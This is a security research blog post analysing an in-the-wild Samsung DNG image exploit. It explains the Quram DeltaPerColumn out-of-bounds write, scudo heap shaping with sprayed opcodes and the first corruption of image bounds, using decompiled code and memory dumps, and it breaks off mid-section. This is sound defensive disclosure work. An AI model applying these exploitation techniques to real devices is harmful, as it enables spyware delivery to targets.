A look at an Android ITW DNG exploit

December 12, 2025, 15:01

 Posted by Benoît Sevens, Google Threat Intelligence Group

Introduction

Between July 2024 and February 2025, 6 suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group.


Investigation showed that these images were DNG files targeting the Quram library, an image parsing library specific to Samsung devices.


On November 7, 2025, Unit 42 released a blogpost describing how these exploits were used and the spyware they dropped. In this blogpost, we would like to focus on the technical details of how the exploits worked. The exploited Samsung vulnerability was fixed in April 2025.


There has been excellent prior work describing image-based exploits targeting iOS, such as Project Zero’s writeup on FORCEDENTRY. Similar in-the-wild “one-shot” image-based exploits targeting Android have received less public documentation, but that is certainly not for lack of such exploits existing. We therefore believe it is an interesting case study to publicly document the technical details of such an exploit on Android.

Attack vector

The VirusTotal submission filenames of several of these exploits indicated that these images were received over WhatsApp:


IMG-20240723-WA0000.jpg

IMG-20240723-WA0001.jpg

IMG-20250120-WA0005.jpg

WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg


The first three filenames follow the naming scheme of WhatsApp on Android. The last filename is how WhatsApp Web names image downloads.


The first two images were received on the same day, based on the filename, potentially by the same target. Later analysis showed that the first image targets the jemalloc allocator, while the second one targets the scudo allocator, used on more recent Android versions. This blogpost will detail the scudo version of the exploit as this allocator is more hardened and relevant for recent devices. The concepts and techniques used in the jemalloc version are similar.


The final payload (as we’ll see later) indicates that the exploit expects to run within the com.samsung.ipservice process. How are WhatsApp and com.samsung.ipservice related and what is this process?


The com.samsung.ipservice process is a Samsung-specific system service responsible for providing "intelligent" or AI-powered features to other Samsung applications. It will periodically scan and parse images and videos in Android’s MediaStore.


When WhatsApp receives and downloads an image, it will insert it in the MediaStore. This means that downloaded WhatsApp images (and videos) can hit image parsing attack surface within the com.samsung.ipservice application.


However, WhatsApp does not intend to automatically download images from untrusted contacts. (The logic in WhatsApp on Android is a bit more nuanced; more details can be found in Brendon Tiszka’s report of a different issue.) This means that, without additional bypasses and assuming the image is sent by an untrusted contact, a target would have to click the image to trigger the download and have it added to the MediaStore, making this in fact a “1-click” exploit. We don’t have any knowledge or evidence of the attacker using such a bypass, though.

A curious image

Before we delve into the exploit, let’s gather an understanding of what type of file we are looking at.


$ file "WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg" 

WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg: TIFF image data, little-endian, direntries=24, width=1, height=1, bps=8, compression=none, PhotometricInterpretation=BlackIsZero, description={"shape": [1, 1, 1]}, manufacturer=Canon, model=Canon EOS 350D DIGITAL, orientation=upper-left

$ exiftool "WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg"

...

File Type                       : DNG

File Type Extension             : dng

MIME Type                       : image/x-adobe-dng

...

Image Width                     : 16

Image Height                    : 16

Bits Per Sample                 : 8

Compression                     : Uncompressed

Photometric Interpretation      : Color Filter Array

Image Description               : {"shape": [16, 16]}

Samples Per Pixel               : 1

X Resolution                    : 1

Y Resolution                    : 1

Resolution Unit                 : None

Tile Width                      : 16

Tile Length                     : 16

Tile Offsets                    : 6596538

Tile Byte Counts                : 256

CFA Repeat Pattern Dim          : 2 2

CFA Pattern 2                   : 0 1 1 2

CFA Plane Color                 : Red,Green,Blue

CFA Layout                      : Rectangular

Active Area                     : 0 0 10 10

Opcode List 1                   : [opcode 23], [opcode 23], [opcode 23], [opcode 23], ...

Opcode List 2                   : [opcode 23], [opcode 23], [opcode 23], [opcode 23], [opcode 23], ...

Opcode List 3                   : TrimBounds, DeltaPerColumn, DeltaPerColumn, DeltaPerColumn, ...

Subfile Type                    : Full-resolution image

Strip Offsets                   : 6596794

Strip Byte Counts               : 1

...


(We truncated the “Opcode List” lines, since they contained thousands of opcodes in the actual exiftool output.)


Although the image was saved with a jpeg extension, this image is in fact a Digital Negative (DNG) image. According to Wikipedia:


Digital Negative (DNG) is an open source, lossless, well defined camera RAW data container with the goal to replace a range of proprietary, closed source raw image containers. It has been developed by Adobe.

DNG is based on the TIFF/EP standard format, and mandates significant use of metadata. The specification of the file format is open and not subject to any intellectual property restrictions or patents.


The image width and height look suspiciously small. And what are these opcode lists?

Some DNG format basics

The DNG format specification can be found on Adobe’s website.


DNG files use SubIFD trees, as described in the TIFF-EP specification, in order to contain multiple versions of the same image, such as a preview and a main image. This DNG file has 3 SubIFDs:


  • Type “Preview Image” with width 1 and length 1

  • Type “Main Image” with width 16 and length 16

  • Type “Main Image” with width 1 and length 1


As briefly mentioned, the sizes of these images are obviously very suspicious, as is the fact that there are 2 “Main Image” types. We have not figured out what the purpose of the second main image is (if any).
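As a quick refresher on the TIFF plumbing underneath DNG: every IFD entry is a fixed 12-byte record (tag, field type, value count, then an inline value or an offset to the values). The sketch below decodes a hand-built, purely hypothetical SubIFDs entry; only the 0x014A tag number and the 12-byte layout come from the TIFF/TIFF-EP specifications.

```python
import struct

# Each TIFF/DNG IFD entry is a fixed 12-byte record:
# tag (u16), field type (u16), value count (u32), value-or-offset (u32).
# Tag 0x014A ("SubIFDs") holds the offsets of the child IFD trees.
def parse_ifd_entry(raw: bytes) -> dict:
    tag, ftype, count, value = struct.unpack("<HHII", raw)
    return {"tag": tag, "type": ftype, "count": count, "value": value}

# Hypothetical little-endian SubIFDs entry pointing at 3 child IFDs whose
# offset table lives at file offset 0x1000 (type 4 = LONG).
entry = parse_ifd_entry(struct.pack("<HHII", 0x014A, 4, 3, 0x1000))
assert entry["tag"] == 0x014A and entry["count"] == 3 and entry["value"] == 0x1000
```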


DNG images can contain 3 “opcode lists”. As it will turn out, these “opcodes” are very important in the context of this exploit. Their goal is to offload some processing steps from the camera to the DNG reader; a typical intended use case is performing lens corrections. There are 3 opcode lists because they are applied at different moments during DNG decoding:


  1. The raw image bytes are read from the DNG file, a.k.a. the “stage 1” image.

     • Opcode list 1 specifies the list of opcodes that should be applied to the stage 1 image.

  2. The DNG decoder maps the raw image bytes to linear reference values, which results in a “stage 2” image.

     • Opcode list 2 specifies the list of opcodes that should be applied to the stage 2 image.

  3. The DNG decoder performs demosaicing of the linear reference values, which results in a “stage 3” image.

     • Opcode list 3 specifies the list of opcodes that should be applied to the stage 3 image.


    Every opcode has an opcode ID and a varying number and type of parameters. The latest specification (1.7.1.0 from September 2023) contains 14 distinct opcodes, with opcode IDs going from 1 to 14. Below is an example of an opcode description found in the specification:



    For this exploit, only 3 opcodes will be of interest: 

    • TrimBounds (opcode ID 6): This opcode trims the image to a specified rectangle. 

    • MapTable (opcode ID 7): This opcode maps a specified area and plane range of an image through a 16-bit lookup table.

    • DeltaPerColumn (opcode ID 11): This opcode applies a per-column delta (constant offset) to a specified area and plane range of an image. 


    DeltaPerColumn and MapTable perform transformations on areas (defined by a top, left, bottom and right parameter) and plane ranges (defined by a first plane and number of planes parameter). 
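As background on where all these opcodes live in the file: each opcode list is serialized as a flat blob, stored big-endian regardless of the file’s overall byte order, with a u32 opcode count followed, per opcode, by the opcode ID, minimum DNG version, flags, and a parameter byte count. A minimal parsing sketch (the exact version encoding shown is our assumption):

```python
import struct

# Sketch of the on-disk opcode-list layout per the DNG specification:
# u32 opcode count, then per opcode: opcode ID (u32), minimum DNG
# version (u32), flags (u32), parameter byte count (u32), parameters.
FLAG_OPTIONAL = 1  # "skip this opcode if the reader does not know it"

def parse_opcode_list(data: bytes):
    (count,) = struct.unpack_from(">I", data)
    pos, opcodes = 4, []
    for _ in range(count):
        oid, ver, flags, nparams = struct.unpack_from(">IIII", data, pos)
        pos += 16
        opcodes.append((oid, ver, flags, data[pos:pos + nparams]))
        pos += nparams
    return opcodes

# A hypothetical list holding one unknown opcode (ID 23) with no
# parameters, flagged as optional -- the kind the exploit sprays.
blob = struct.pack(">I", 1) + struct.pack(">IIII", 23, 0x01040000, 1, 0)
[(oid, ver, flags, params)] = parse_opcode_list(blob)
assert oid == 23 and flags & FLAG_OPTIONAL and params == b""
```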


    Looking at the opcode lists in the exiftool output above, we already notice some suspicious things:


    • They use opcodes with opcode ID 23 (which exiftool cannot map to an opcode name).

    • Typical benign DNG images contain only a handful of opcodes, while this image has thousands of opcodes in its opcode lists.

Quram

    As we mentioned before, based on the payload, the targeted process is the Samsung firmware-specific com.samsung.ipservice. The next question then becomes what code in this application performs the DNG decoding.


    Looking at a decompiled com.samsung.ipservice APK (which on our test phone was located at /system/priv-app/IPService/IPService.apk), we can see that when the application parses a file with an extension of "jpg", "jpeg", "JPG" or "JPEG", it will call into the Java method com.quramsoft.images.QrBitmapFactory.decodeFile (bundled in the same APK).


    public class com.quramsoft.images.QrBitmapFactory {


       public static Bitmap decodeFile(String str, Options options) {

            Bitmap decodeFile = QuramBitmapFactory.decodeFile(str, options); // [1]; calls into Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2

                                                                             // Fails

            if ((options.inJustDecodeBounds && (options.outWidth > 0 || options.outHeight > 0)) || decodeFile != null) {

                return decodeFile;

            }

            try {

                Bitmap decodeFile2 = QuramDngBitmap.decodeFile(str, options); // [2]; calls into Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI

                if (options.outWidth <= 0) {

                    if (options.outHeight <= 0) {

                        return decodeFile2;

                    }

                }

                options.outMimeType = "image/dng";

                return decodeFile2;

            } catch (IOException e2) {

                e2.printStackTrace();

                return null;

            }

        }
    }


    The "Quram library" is a set of proprietary, closed-source software libraries used by Samsung on its Android devices. Its primary function is to process, parse, and decode various image formats. The library is not developed by Samsung itself. It is created by a third-party software vendor named Quramsoft. Mateusz Jurczyk already wrote about this library in 2020.


    The QrBitmapFactory.decodeFile method will first try to decode the image using QuramBitmapFactory.decodeFile (see [1]), which calls the exported Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2 function of the native library libimagecodec.quram.so. This function handles formats such as PNG, JPEG and GIF, but not DNG. This native library is not part of the IPService APK but rather located at /system/lib64/libimagecodec.quram.so.


    When QuramBitmapFactory.decodeFile fails, QrBitmapFactory.decodeFile calls QuramDngBitmap.decodeFile as a fallback (see [2]), which then calls Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI. This function performs the complete DNG decoding, and it is within this code path that the vulnerability is triggered and the exploit fully executes.


    The call sequence is summarized below:


    com.quramsoft.images.QrBitmapFactory.decodeFile (com.samsung.ipservice.apk)

    |_ com.quramsoft.images.QuramBitmapFactory.decodeFile (com.samsung.ipservice.apk)

    |  |_  Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2 (/system/lib64/libimagecodec.quram.so) // Fails

    |

    |_ com.quramsoft.images.QuramDngBitmap.decodeFile (com.samsung.ipservice.apk)

       |_ Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI (/system/lib64/libimagecodec.quram.so) // Triggers bug


Analysis setup

    A few tools came in handy when analysing this exploit, which we’ll describe next.


    First of all, on the static analysis side, we need an overview of the different opcodes that are called with their parameters. exiftool only gives us a list of the (translated) opcode IDs. To inspect every opcode with its parameters, we can use the dng_validate tool provided by Adobe’s DNG SDK with the -v flag. It will parse the opcode lists and we can post-process its textual output to make sense of the thousands of opcodes. Here is a snippet of what the output looks like, showing us the different parameters of a few TrimBounds and DeltaPerColumn opcodes.


    ...

    Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1


    Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1


    Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1


    Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1


    Parsing OpcodeList3: 5347 opcodes


    Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

    Bounds: t=0, l=0, b=1, r=1


    Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=0, b=1, r=1, p=5125:5123, rp=1, cp=1

    Count: 1

        Delta [0] = 26214.000000


    Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=0, b=1, r=1, p=5127:5125, rp=1, cp=1

    Count: 1

        Delta [0] = 26214.000000


    Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=0, b=1, r=1, p=5157:5155, rp=1, cp=1

    Count: 1

        Delta [0] = 26214.000000

    ...



    On the dynamic analysis side, debugging com.samsung.ipservice would be very annoying, since it only runs periodically (although there are tricks to force start it). For easier debugging, we reused @flankerhqd’s fuzzing harness (in part based on Project Zero’s SkCodecFuzzer), which loads a DNG file provided as a filename into a buffer and passes it to libimagecodec.quram.so’s QrDecodeDNGPreview. We compile it as a standalone binary and can run it under a debugger.


    It is noteworthy that QrDecodeDNGPreview (used in our harness) is not the export called by com.samsung.ipservice (which ends up calling QuramDngDecoder::decode). However, if there is no preview image available with one of the JPEG compression types, QrDecodeDNGPreview will call QuramDngDecoder::decodePreview, which will also perform a full DNG decoding and successfully triggers the vulnerability and exploit. 


    Our test phone was a Samsung Galaxy S21 5G (SM-G991B) running firmware version G991BXXSAFXCL, which has a security patch level of 2024-04-01.

The bug

    Using the dng_validate tool we can make a listing of the sequence of opcodes called and their number of repetitions:


    $ grep Opcode dng_validate.out  | uniq -c

          1 OpcodeList1: count = 320004, offset = 814

          1 OpcodeList2: count = 3844, offset = 320818

          1 OpcodeList3: count = 6271556, offset = 324662

          1 Parsing OpcodeList1: 20000 opcodes

      20000 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Parsing OpcodeList2: 240 opcodes

        240 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Parsing OpcodeList3: 5347 opcodes

          1 Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

        480 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          1 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         34 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          2 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         34 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          1 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

        400 Opcode: TrimBounds, minVersion = 1.4.0.1, flags = 1

          4 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         48 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          4 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

        216 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          4 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         24 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

         15 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         34 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          1 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         34 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

        240 Opcode: TrimBounds, minVersion = 1.4.0.1, flags = 1

          2 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         48 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          2 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

        216 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          4 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

         12 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

          6 Opcode: MapTable, minVersion = 1.4.0.0, flags = 1

       2438 Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

       1040 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

          1 Opcode: ScalePerColumn, minVersion = 1.4.0.0, flags = 1


    The specification mentions that if the flag bit is set (which it is), opcodes with unknown opcode IDs should be skipped. So let’s for the moment ignore the “Unknown” opcodes with ID 23 (more on them later).


    Let’s look at the first 2 known opcodes, which occur in opcode list 3:


    $ grep -A8 TrimBounds dng_validate.out  | head -n 8

    Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

    Bounds: t=0, l=0, b=1, r=1


    Opcode: DeltaPerColumn, minVersion = 1.4.0.0, flags = 1

    AreaSpec: t=0, l=0, b=1, r=1, p=5125:5123, rp=1, cp=1

    Count: 1

        Delta [0] = 26214.000000



    The DNG opcode parameters are embedded directly in the file. DeltaPerColumn takes a list of deltas to be applied to each pixel and the “AreaSpec” to operate over: top, left, bottom and right coordinates, the first plane and number of planes being targeted, and the row and column pitch (rowPitch and colPitch). These values are controllable by the attacker.


    The “first plane” (5125) and “number of planes” (5123) parameters of the DeltaPerColumn opcode are very suspicious. At stage 3 in the DNG decoding, the number of planes will be 3 (R, G and B), as can be seen in the CFA related data of the exiftool output. The first value (5125) is the first plane to apply the DeltaPerColumn to, while the second value (5123) is the number of planes. Since the planes are numbered 0 to 2, these values are clearly out of bounds.


    Let’s have a look at QuramDngOpcodeDeltaPerColumn::processArea, which is the handler for the DeltaPerColumn opcode. Below are the lines of that function relevant to the vulnerability. (Variable names were chosen by us, since this is a closed-source library.)



    __int64 __fastcall QuramDngOpcodeDeltaPerColumn::processArea(

            QuramDngOpcode *opcode,

            QuramDngDecoder *decoder,

            QuramDngImage *image,

            QuramDngRect *rect)

    {

    ...

        image_buffer = image->buffer;

    ...

                    image_number_of_planes = image_buffer->planes;  // 3

                    opcode_first_plane = opcode->plane;  // 5125

    ....

                    opcode_number_of_planes = opcode->planes;  // 5123

                    opcode_last_plane = image_number_of_planes + opcode_number_of_planes;  // 3 + 5123 = 5126

    ...

                        if (opcode_first_plane < opcode_last_plane )  // 5125 < 5126

                        {

    ...

                                current_plane = opcode_first_plane;  // 5125

    ...

                                    do

                                    {

    ...                                 // Add delta to the value in the raw pixel buffer at offset corresponding to plane `current_plane`, i.e. 5125!

                                        current_plane++;

                                    }

                                    while ( current_plane != opcode_last_plane );  // 5125 != 5126

    ...

    }


    The function takes a few objects with Quram specific structure as arguments. The QuramDngImage describes the image on which the opcode is to be applied (which is the stage 3 image at this point). The QuramDngOpcode contains the DeltaPerColumn parameters. The function has a triple nested loop to iterate over the width, length and planes of the area. For every such triplet (width,length,plane) it calculates the offset in the raw pixel buffer and adds a delta to it. Only the plane loop is relevant for the bug and displayed in the code above.


    Below is an example of a 6x6 image with its different color planes and to what offsets the pixel values map in the raw pixel buffer. During stage 2 and stage 3 image processing, each pixel value in each color plane takes 16 bits.


    There are two issues in this handler function:

    • opcode_last_plane is calculated incorrectly. It should be opcode_first_plane + opcode_number_of_planes (as is the case in the patched version). This by itself is a correctness issue, and a pretty basic one that would be expected to surface during normal usage or testing of the library.

    • The plane used in the offset calculation is bounded by opcode_last_plane, but at no point is it checked that opcode_last_plane lies within the number of planes that the image contains.


    The actual values from the exploit are annotated as comments in the code snippet. With these values, the plane loop will execute exactly once. The width and length loops will also execute only once, since t=0, l=0, b=1, r=1. This means exactly one write will happen. Since the stage 3 image in the exploit has width 1 and length 1, the write will happen at offset 5125 x 2 = 10250 from the raw pixel buffer.
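The flawed plane-bound arithmetic is easy to restate in a few lines; below is our own condensed sketch (not Quram's code), plugging in the exploit's values:

```python
# Reproduction of the flawed plane-bound arithmetic, using the exploit's
# parameters: image planes = 3, opcode first plane = 5125, plane count = 5123.
PIXEL_SIZE = 2  # stage-3 pixel values are 16 bits each

def buggy_plane_range(image_planes, first_plane, num_planes):
    # Bug: the upper bound should be first_plane + num_planes, and it
    # should additionally be clamped to image_planes; instead the code
    # computes image_planes + num_planes.
    last_plane = image_planes + num_planes
    return range(first_plane, last_plane)

planes = list(buggy_plane_range(3, 5125, 5123))
assert planes == [5125]                 # the plane loop runs exactly once...
assert planes[0] * PIXEL_SIZE == 10250  # ...writing 10250 bytes past the
                                        # start of the 1x1 raw pixel buffer
```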


    Not only is the offset of the write controlled, the value to be added to the current value in the raw pixel buffer is also fully controlled, since it is an opcode parameter. In this case it is 26214.0 (or 0x6666). This vulnerability thus gives a very strong primitive from the start: the attacker can add chosen values at chosen offsets relative to the raw pixel buffer.


    Now why do we need that TrimBounds opcode before triggering the bug? That will become clear when we discuss the heap shaping strategy. 

Exploit flow

Heap shaping strategy

    Since the buffers containing the pixel values are dynamically allocated on the heap, understanding the heap layout at the time the vulnerability triggers requires understanding which heap allocations the Quram library makes and how these allocations behave.


    As we mentioned earlier, exploits exist for Android versions using both jemalloc and scudo allocator. We will analyse the exploit targeting the scudo allocator, since this is the common allocator on modern Android versions. The same techniques were used in a different way in the jemalloc exploit.

Scudo

    We will not give a detailed overview of Android’s scudo allocator, which is used here for the allocations; excellent documentation by Synacktiv already exists, to which we refer the reader. We will only mention the elements that are important for this exploit.


    Scudo allocates objects in different heap regions depending on the allocation size. For two objects of different types to land near each other, they need to belong to the same size class. The size required from the allocator’s point of view for a “block” is composed of:

    • A header of 0x10 bytes

    • The chunk with the user requested size. A pointer to the chunk is returned to the caller.


    New allocations are retrieved via “transfer batches”. The number of allocations in a transfer batch depends on the size class. For the size we will be interested in (chunks of 0x30 bytes, i.e. blocks of 0x40 bytes), there are 52 allocations in a transfer batch. The allocations within a transfer batch are returned in a randomized order; however, subsequent transfer batches are laid out linearly in memory. A consequence of this is that, given enough allocations between two allocations of the same size, an attacker can be confident that the later allocation lands at a higher address than the first.
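This batching behaviour can be illustrated with a toy model (a simulation of the property described above, not scudo's actual code):

```python
import random

# Toy model of one scudo size class: each "transfer batch" of 52 blocks is
# handed out in randomized order, but successive batches occupy linearly
# increasing addresses.
BATCH, BLOCK = 52, 0x40

def simulate_allocations(n, seed=0):
    rng, addrs = random.Random(seed), []
    for batch_index in range((n + BATCH - 1) // BATCH):
        base = batch_index * BATCH * BLOCK
        batch = [base + i * BLOCK for i in range(BATCH)]
        rng.shuffle(batch)  # order within one batch is unpredictable
        addrs.extend(batch)
    return addrs[:n]

addrs = simulate_allocations(500)
# Two allocations separated by more than a full batch cannot be reordered:
# allocation 0 lies in batch 0, allocation 104 in batch 2 or later.
assert all(addrs[0] < addrs[i] for i in range(2 * BATCH, 500))
```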


    Lastly, scudo supports a quarantine mechanism that prevents freed allocations from being returned immediately by a subsequent allocation request. On Android, however, this quarantine mechanism is disabled. The consequence is that a freed object will be directly reused by the next allocation request of the same size.

Quram’s heap allocations

    With a basic understanding of scudo’s allocation behaviour, let’s look at the specific heap allocations Quram makes when decoding a DNG file.


    First, when Quram parses the opcode lists in the DNG file, it will allocate one QuramDngOpcode object per opcode. These objects contain the parameters of the opcode, as well as a vtable pointer to the handlers for that opcode. The size of such an object thus depends on the number and type of parameters, and hence on the type of opcode. The sizes of the different opcodes can be looked up in QuramDngDecoder::makeDngOpcode. For the exploit at hand, only the following opcode sizes are relevant:

    • DeltaPerColumn (opcode ID 11): 0x50 bytes
    • MapTable (opcode ID 7): 0x50 bytes
    • TrimBounds (opcode ID 6): 0x30 bytes
    • Unknown (starting at opcode ID 14, such as opcode ID 23 in the exploit): 0x30 bytes


    This means TrimBounds and Unknown opcodes will land in the same heap region, distinct from the heap region containing the DeltaPerColumn and MapTable opcodes.
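A trivial way to see the resulting grouping, assuming blocks are simply the chunk size plus the 0x10-byte header (for the 0x30-byte chunks this matches the 0x40-byte blocks mentioned earlier; the 0x60 figure for the 0x50-byte opcodes is our assumption):

```python
# Opcode object sizes from QuramDngDecoder::makeDngOpcode; opcodes with
# equal allocation sizes end up in the same scudo region.
OPCODE_SIZES = {
    "DeltaPerColumn": 0x50,
    "MapTable":       0x50,
    "TrimBounds":     0x30,
    "Unknown":        0x30,  # opcode IDs >= 14, such as ID 23 in the exploit
}
HEADER = 0x10  # scudo header prepended to every chunk

regions = {}
for name, size in OPCODE_SIZES.items():
    regions.setdefault(size + HEADER, []).append(name)

# 0x30-byte chunks occupy 0x40-byte blocks, so TrimBounds and Unknown
# opcodes neighbour each other, apart from DeltaPerColumn/MapTable.
assert sorted(regions[0x40]) == ["TrimBounds", "Unknown"]
assert sorted(regions[0x60]) == ["DeltaPerColumn", "MapTable"]
```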


    Next, for every stage image, Quram will allocate three heap buffers:

    • A QuramDngImage of fixed size 0x30, which describes the image

    • A buffer for the pixel values of variable size (depending on width, height and number of planes)

    • A QuramDngPixelBuffer of fixed size 0x40, which describes the contents of the buffer


    These different objects and their relationship are illustrated below:



    There are two “pixel buffers” at play here, which can be a bit confusing: the QuramDngPixelBuffer object and the raw buffer of pixel values. In what follows, “raw pixel buffer” refers to the latter.


    QuramDngImage and QuramDngPixelBuffer will land in different heap regions since they belong to different scudo allocation class sizes. The raw pixel buffer may end up in the same heap region as a QuramDngImage depending on its size. Its size is calculated by ComputeBufferSize. For the dimensions of the stage 3 image of the exploit (width 1 by length 1 with 3 color planes) it will calculate a size of 0x30 bytes (even though 6 bytes would suffice). For the stage 1 and stage 2 images, the sizes are different and will be allocated in a different heap region.


    To conclude, both the TrimBounds opcodes, the Unknown opcodes, the QuramDngImage objects as well as potentially the raw pixel buffer will end up in the same heap region.

Final heap layout

    We can now study the sequence of events during DNG decoding to understand the heap layout at the time of the vulnerability trigger:


    • QuramDngDecoder::getRegionStage1Image will allocate a “stage 1” QuramDngImage (size 0x30)

    • QuramDngDecoder::readStage1Image parses the 3 opcode lists and allocates a QuramDngOpcode structure per opcode. As we saw, only TrimBounds and Unknown opcodes will land in the same heap region of 0x30 bytes chunks, which is of interest to us. Other opcodes are allocated in different heap regions.



    $ grep -E 'OpcodeList|TrimBounds|Unknown' dng_validate.out  | uniq -c

          1 OpcodeList1: count = 320004, offset = 814

          1 OpcodeList2: count = 3844, offset = 320818

          1 OpcodeList3: count = 6271556, offset = 324662

          1 Parsing OpcodeList1: 20000 opcodes

      20000 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Parsing OpcodeList2: 240 opcodes

        240 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Parsing OpcodeList3: 5347 opcodes

          1 Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1

        640 Opcode: TrimBounds, minVersion = 1.4.0.1, flags = 1

       1040 Opcode: Unknown (23), minVersion = 1.4.0.0, flags = 1

          1 Opcode: TrimBounds, minVersion = 1.4.0.0, flags = 1


    • QuramDngDecoder::buildStage2Image will apply opcode list 1. When it is done, the 20000 unknown opcodes it contains are freed.

    • QuramDngDecoder::doBuildStage2 will allocate a QuramDngImage “stage 2” (size 0x30) and convert stage 1 to stage 2. This stage 2 image will take the spot of the last opcode of opcode list 1 that was freed.

    • QuramDngDecoder::buildStage2Image can now free the “stage 1” QuramDngImage. It will then process opcode list 2 and free the 240 “unknown” opcodes.

    • QuramDngDecoder::doInterpolateStage3 will allocate both a new “stage 3” QuramDngImage (size 0x30) and subsequently a raw pixel buffer of size 0x30. These will take the spots of the last 2 opcodes freed from opcode list 2 in the previous step.

    • QuramDngDecoder::buildStage3Image can now free the “stage 2” QuramDngImage.

    • Opcode list 3 gets processed now. In the first TrimBounds opcode, QuramDngOpcodeTrimBounds::doApply will allocate a new raw pixel buffer of size 0x30 (although the replaced raw pixel buffer has the exact same size). This allocation will take the spot of the freed stage 2 image.

      • Note that the 640 other TrimBounds opcodes have a “minVersion” of 1.4.0.1. This is a trick that will make QuramDngOpcode::aboutToApply bail out early and not have the TrimBounds actually executed. The goal of spraying these 640 TrimBounds opcodes will become clear later.


    The eventual heap layout for chunks of size 0x30 is illustrated below. The annotated offsets will be important later on.





    Note that because of scudo’s randomization strategy, the allocations of different opcode lists will actually overlap slightly (on the order of 52 allocations), but given enough allocations this effect can be neglected.


    Because the allocations have chunk sizes of 0x30 bytes, they take up 0x40 bytes on the heap. Different chunks in this heap region are thus spaced by multiples of 0x40 bytes, which will help us in quickly inferring what parts of an object are being corrupted. The illustration also depicts the sizes the allocations occupy in total, which will be important for understanding the subsequent exploitation flow.


    As we’ll see, the exploit will write out of bounds from the raw pixel buffer of stage 3 into the QuramDngImage of stage 3. This explains why the attackers first used a TrimBounds opcode before triggering the bug: it ensures that the raw pixel buffer ends up before the QuramDngImage. Without it, there would be a one-in-two chance that the raw pixel buffer takes a spot after the QuramDngImage.

    The initial corruption

    After achieving the right heap layout using the TrimBounds opcodes, 480 DeltaPerColumn opcodes follow. As a reminder, these are allocated in a different heap region because of a different allocation size. As discussed, DeltaPerColumn opcodes are able to add arbitrary values at arbitrary offsets out of bounds. The attackers add 0x6666 at byte offsets 10 and 14 within 240 heap objects, starting at offset 0x2800 from the raw pixel buffer and ending at offset 0x6400.
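    As a quick sanity check on those numbers, here is a small sketch (assuming the 0x40 chunk spacing described above):

```python
# Chunks in this scudo size class are spaced 0x40 bytes apart, so the
# DeltaPerColumn corruption hits one heap object every 0x40 bytes between
# offsets 0x2800 and 0x6400 from the raw pixel buffer.
CHUNK_SPACING = 0x40
START, END = 0x2800, 0x6400

corrupted_offsets = list(range(START, END, CHUNK_SPACING))
num_corrupted = len(corrupted_offsets)   # 240 heap objects
```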


    Looking at our heap layout, we will corrupt three types of objects at these offsets:


    • Unknown and TrimBounds opcodes: opcode structures contain the opcode ID at offset 8 and the specification version at offset 12. Since the opcode IDs will be corrupted, these TrimBounds and Unknown opcodes will simply be skipped later on (which was already the case for the Unknown opcodes).


    Before:

    0xb400007e3e3fa050:     0x0000007fee5a3fb0      0x0104000000000017

    0xb400007e3e3fa060:     0x0000000100000001      0x0000000000000002

    0xb400007e3e3fa070:     0x0000000000000000      0x0000000000000000

    After:

    0xb400007e3e3fa050:     0x0000007fee5a3fb0      0x676a000066660017

    0xb400007e3e3fa060:     0x0000000100000001      0x0000000000000002

    0xb400007e3e3fa070:     0x0000000000000000      0x0000000000000000


    • Most importantly, it will encounter the QuramDngImage object. The two corrupted fields of this object are the “bottom” and “right” fields of the image, which are used in other opcode handlers for verifying if operations are within bounds. This means that we can now use other opcodes, such as MapTable, to perform actions out of bounds.


    Before:

    0xb400007e3e3fb810:     0x0000000000000000      0x0000000100000001

